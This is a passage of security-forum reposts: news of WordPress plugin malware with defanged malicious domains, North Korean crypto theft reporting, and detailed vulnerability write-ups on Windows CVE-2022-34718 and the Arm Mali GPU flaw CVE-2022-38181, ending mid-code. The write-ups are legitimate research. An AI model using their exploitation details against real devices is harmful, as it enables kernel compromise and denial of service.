  26. People who use WordPress should check their sites for unpatched plugins. Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week. The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It’s also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system. Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It’s possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware. The plugins exploited include: WP Live Chat Support Plugin WordPress – Yuzo Related Posts Yellow Pencil Visual Theme Customizer Plugin Easysmtp WP GDPR Compliance Plugin Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972) Thim Core Google Code Inserter Total Donations Plugin Post Custom Templates Lite WP Quick Booking Manager Facebook Live Chat by Zotabox Blog Designer WordPress Plugin WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233) WP-Matomo Integration (WP-Piwik) WordPress ND Shortcodes For Visual Composer WP Live Chat Coming Soon Page and Maintenance Mode Hybrid Brizy WordPress Plugin FV Flowplayer Video Player WooCommerce WordPress Coming Soon Page WordPress theme OneTone Simple Fields WordPress Plugin WordPress Delucks SEO plugin Poll, Survey, Form & Quiz Maker by OpinionStage Social Metrics Tracker WPeMatico RSS Feed Fetcher Rich Reviews plugin “If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server,” the Dr.Web writeup explained. “With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first—regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to.” The JavaScript contains links to a variety of malicious domains, including: lobbydesires[.]com letsmakeparty3[.]ga deliverygoodstrategies[.]com gabriellalovecats[.]com css[.]digestcolect[.]com clon[.]collectfasttracks[.]com Count[.]trackstatisticsss[.]com The screenshot below shows how the JavaScript appears in the page source of the infected site: The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years. WordPress plugins have long been a common means for infecting sites. While the security of the main application is fairly robust, many plugins are riddled with vulnerabilities that can lead to infection. Criminals use infected sites to redirect visitors to sites used for phishing, ad fraud, and distributing malware. People running WordPress sites should ensure that they’re using the most current versions of the main software as well as any plugins. They should prioritize updating any of the plugins listed above. Source
    2 points
  27. Mersi de feedback! Motivul pentru care nu oferim partea de WAF e pur business. Ai dreptate, foarte multi clienti vor ca tu sa faci filtrarea, dar tot ei sunt cei care iti spun: "noi nu vrem ca tu sa ai control asupra datelor pe care eu le primesc sau le trimit", iar a face partea de WAF fara control asupra datelor nu se poate. Pentru partea de DDoS protection, scopul nostru actual este in a detecta atacuri, nu a le bloca. Cand vorbim de un atac de tip DDoS protectia se face foarte putin la nivel logic ci foarte mult la nivel fizic (avand posibilitatea in a "handelui" mai mult trafic prin infrastructura network mai buna) sau prin a avea integrari/automatizari/access facil la reteaua internet provideri-lor. Iar toate aceste lucruri nu sunt in scopul nostru deoarece 1 pt infrastructura ai nevoie de bani (iar aia e independent fata de mine) si 2 pentru a putea prelua partea de ISP iar nu ti-o acorda nimeni. Pentru partea de DLP - same story - avem nevoie control (clientul nu da control). Si aici pot da 2 exemple usoare: 1. Eu nu am cum sa observ daca tu ai un data leakage in traficul tau decat daca tu imi permiti ca eu sa-ti montez un SSL proxy in infrastructura si sa-ti anlizez asta (ceea ce nu permite nimeni) 2. Sa presupunem ca lasam criptarea la o parte si totul este necriptat (un serviciu FTP). Daca eu vad ca tu incerci sa copezi foarte multe fisiere si te blochez, tu ca si client vii si imi spui, pai da dar eu nu iti pot permite tie sa blochezi traficul meu deoarece nu stiu daca tu imi afectezi sau nu productia cu chestiile tale. Partea de monitoring/alerting o oferim intr-o oarecare masura si o putem acoperi fara probleme. Partea de response time - noi nu generam incidente, putem face asta, putem sa si le investigam si sa le rezolvam dar din nou, nu e in modelul nostru de business. Legat de Imperva, ai dreptate, parte din lucrurile pe care noi le facem sunt oferite si de poate alte 50 de companii, insa sunt lucruri pe care noi le oferim si altii nu le au, cum ar fi partea de live traffic + detection si partea de machine learning / behaviour analysis personalizat pe site-ul fiecaruia (nu stiu vendor care sa faca asta). Roadmapul - avem multe in plan. Momentan suntem 2 si suntem destul de limitati de timp, dar majoritatea chestiilor enumarate aici le vom acoperi mai de vreme sau mai tarziu (sau le vom atinge tangential). Limitariile serviciilor: asta incercam si noi sa aflam (de aici si postul initial). Am avut probleme de scalare in functie de traficul site-ului, dar acelea au fost rezolvate si suntem pregatiti pentru noi challenge-uri. Inca odata mersi de feedback!
    2 points
  28. Fainuc proiectul, si inteleg ca a fost multa munca, dar pe partea de defense cum e? Nu am citit nimic decat ca nu e WAF, deci atunci e bun *numai* pe partea de analiza. Dorinta clientilor atunci devine ca un produs sa aiba de toate, inclusiv WAF, DDoS protection, DLP, monitoring/alerting, geo blocking, response time (tech support) sa fie imediat atunci cand sunt probleme, etc. Multi clienti incearca sa reduca din numarul de platforme, si nu sa adauge. Sunt multe produse deja care fac toate sau multe din lucrurile mentionate ca si produsele de la Imperva. Care e viitorul platformei atunci - roadmap-ul? Care sunt limitarile serviciilor care sunt deja functionale? Noroc in continuare.
    2 points
  29. North Korea-linked hackers stole $1.7bn of cryptocurrency in 2022 North Korea-backed hackers stole $1.7bn (£1.4bn) of crypto in 2022, says blockchain analysis firm Chainalysis. This nearly quadruples the country's previous record for cryptocurrency theft - $429m in 2021. The loot also made up 44% of the $3.8bn stolen in crypto hacks last year, which the firm called "the biggest year ever for crypto hacking". Experts have said the country, facing heavy sanctions, is turning to crypto theft to fund its nuclear arsenal. North Korea has conducted six nuclear tests and analysts expect the seventh one this year, as the country accelerates its nuclear weapons programme under leader Kim Jong-un. Last year, Pyongyang launched a record number of ballistic and other missiles. This is despite the country's struggling economy. These hackers typically launder crypto through "mixers", which blend cryptocurrencies from various users to obfuscate the origins of the funds, the firm said. Other experts have also said that North Korea launders stolen crypto through brokers in China and non-fungible tokens (NFTs). Last month, the FBI confirmed that North Korea-affiliated Lazarus Group was responsible for a $100m crypto heist on a blockchain network called Horizon bridge last year. Overall, decentralised finance protocols, or DeFi, accounted for over 82% of cryptocurrency stolen in 2022, Chainalysis' report said. DeFi users know what will happen to their funds when they use them because smart contract codes governing these protocols are publicly accessible by default. But this transparency also makes DeFi particularly attractive to hackers, who can scan the codes for vulnerabilities and "strike at the perfect time" to maximise their loot, according to the report. David Schwed, chief operating officer at blockchain security firm Halborn, noted that DeFi developers "prioritise growth over all else", and funds that could be used to enhance security are often directed instead to rewards, in order to attract users. DeFi developers can take a leaf from traditional financial institutions in making their platforms more secure, Mr Schwed said. For instance, they can simulate different hacking scenarios to test their protocols, or design mechanisms to pause or halt transactions when suspicious activity is detected. "You don't need to move as slow as a bank, but you can borrow from what banks do," he said. Via bbc.com
    1 point
  30. Nice, in teorie puteai sa il duci in RCE, dar probabil au tot bagat mitigations. Sa ne zici cat dau pe el.
    1 point
  31. Monzo, Monese, d/astea de 2 lei... instant inclusv Transivlavia Revolut....
    1 point
  32. Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP” Software Vulnerabilities January 20, 2023 By Valentina Palmiotti 10 min read September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis and craft a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter a blog post and PoC was published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog. In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE). Patch Diffing Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff. I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (checking aggressive instruction finder works best). Afterward, the files can be exported into a BinExport format using the extension BinExport for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences: BinDiff summary comparing the pre- and post-patch binaries BinDiff works by matching functions in the binaries being compared using various algorithms. In this case there, we have applied function symbol information from Microsoft, so all the functions can be matched by name. List of matched functions sorted by similarity Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram. Vulnerability Root Cause Analysis Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets. The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets. Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch. IPv6 Fragmentation: An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation: Illustration of Ipv6 fragmentation According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format: Ipv6 Fragment Header format Where the Next Header field is the type of header present in the fragmented data. IPsec (ESP): IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol. As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of IP header is contained in the encrypted payload, and in transport mode where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows: Top Level Format of an ESP Packet Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data. Now with a primer of Ipv6 Fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched. Ipv6pReassembleDatagram Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram Let’s take a closer look at the block: New code block in the patched function The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block: The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and there has been a “goto error” line inserted into the code, if the check fails. With this bit of insight, we can perform static analysis in a decompiler. 0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments. Decompilation output of Ipv6ReassembleDatagram In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the next_header field in the Ipv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer and on line 35, Reassembly->nextheder_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers. IppReceiveEsp Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch. Decompilation output of IppReceiveESP Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively. Referring back to the ESP RFC it states, “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded. Putting It All Together Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow. Decompilation output of Ipv6ReassembleDatagram Recall that the size of the victim buffer is calculated as the size of the extension headers, plus the size of an Ipv6 header (Line 10 above). Now refer back to the patch that was inserted (Line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value of the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet: Top Level Format of an ESP Packet Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or Ipv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet. Illustrated root cause of CVE-2022-34718 Now refer back to line 35 of Ipv6ReassembleDatagram, this is where an out of bounds 1 byte write occurs (the size and value of NextHeader). Reproducing the Bug We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets? To answer this question, I first tried to send packets to a victim containing an ESP Header with junk data and put a breakpoint on to the vulnerable IppReceiveEsp function, to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established. A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker. For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform WinAPI (WFP). Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP. Exploitation Now that the victim knows how to decrypt ESP traffic from us (the attacker) we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple: CVE-2022-34718 PoC I create a set of fragmented packets from an ICMPv6 Echo request. Then for each fragment, they are encrypted into an ESP layer before sending. Primitive From the root cause analysis diagram pictured above, we know our primitive gives us an out of bounds write at offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length) The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 ). Denial of Service (DoS) Corrupting just one byte into a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated), usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool. Limitations to Overcome For RCE offset is attacker controlled, however according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4 byte aligned. And therefore: offset = 4n - 1 Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated. Heap Grooming Research The affected kernel pool in WinDbg The victim out of bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging. Demo Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below: Takeaways When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now. To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034. References https://www.rfc-editor.org/rfc/rfc8200#section-4.5 https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021 https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml https://datatracker.ietf.org/doc/html/rfc4303 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718 Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
    1 point
  33. Pwning the all Google phone with a non-Google bug It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app. Author Man Yue Mo January 23, 2023 The “not-Google” bug in the “all-Google” phone The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime: CVE-2022-38181 In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12 along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and they passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID, nor the bug ID (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here. The Arm Mali GPU The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some specific devices that use the Mali GPU. As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain and most Android devices use either Qualcomm’s Adreno GPU, or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021– five targeted GPU drivers. Another more recent bug that was exploited in the wild – CVE-2021-39793, disclosed in March 2022 – also targeted a GPU driver. Together, of these six bugs that were exploited in the wild that targeted Android GPU drivers, three bugs targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU. Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT compiled code, as it is created as non-executable memory. Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call. The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the Writing to GPU memory section in my previous post. While the KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”) and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE). The life cycle of JIT memory While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel. When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head: if (info->usage_id != 0) /* First scan for an allocation with the same usage ID */ reg = find_reasonable_region(info, &kctx->jit_pool_head, false); ... if (reg) { ... list_move(&reg->jit_node, &kctx->jit_active_head); If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process. When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region back to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... //First reduce the size of the backing region and unmap the freed pages old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { u64 new_size = MAX(reg->initial_commit, div_u64(old_pages * (100 - kctx->trim_level), 100)); u64 delta = old_pages - new_size; //Free delta pages in the region and reduces its size to old_pages - delta if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); mutex_unlock(&kctx->reg_lock); } } ... //Remove the pages from address space of user process kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context: kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); ... mutex_lock(&kctx->jit_evict_lock); /* This allocation can't already be on a list. */ WARN_ON(!list_empty(&reg->gpu_alloc->evict_node)); //Add reg to evict_list list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list); atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents); //Move reg to jit_pool_head list_move(&reg->jit_node, &kctx->jit_pool_head); After kbase_jit_free completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); } kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference } } ... } As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning them to the kernel when the resources are needed. The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods: struct shrinker { unsigned long (*count_objects)(struct shrinker *, struct shrink_control *sc); unsigned long (*scan_objects)(struct shrinker *, struct shrink_control *sc); ... }; The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers and use their count_objects method to determine potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method: int kbase_mem_evictable_init(struct kbase_context *kctx) { ... //kctx->reclaim is a shrinker kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects; kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects; ... register_shrinker(&kctx->reclaim); return 0; } The more interesting part of these methods is the kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel. static unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s, struct shrink_control *sc) { ... list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) { int err; err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); ... kbase_free_phy_pages_helper(alloc, alloc->evicted); ... list_del_init(&alloc->evict_node); ... kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool` } ... } This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head: void kbase_jit_backing_lost(struct kbase_va_region *reg) { ... list_move(&reg->jit_node, &kctx->jit_destroy_head); schedule_work(&kctx->jit_work); } The memory region in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well not entirely…one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime. The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory is allocated, but this is not a problem, because as we’ve seen before, this reference was cleared when kbase_jit_free_finish was called to put the region in the evict_list and, normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices. The vulnerability While the semantics of memory eviction is closely tied to JIT memory with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_objects), evictable memory is more general and other types of GPU memory can also be added to the evict_list and be made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be called via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the KBASE_REG_DONT_NEED flag is passed, a memory region can be added or removed from the evict_list: int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask) { ... prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED; new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED; if (prev_needed != new_needed) { ... if (new_needed) { ... ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list` if (ret) goto out_unlock; } else { kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list` } } By putting a JIT memory region directly in the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed with a pointer to it still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish to use the freed object pointed to in jit_alloc: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && 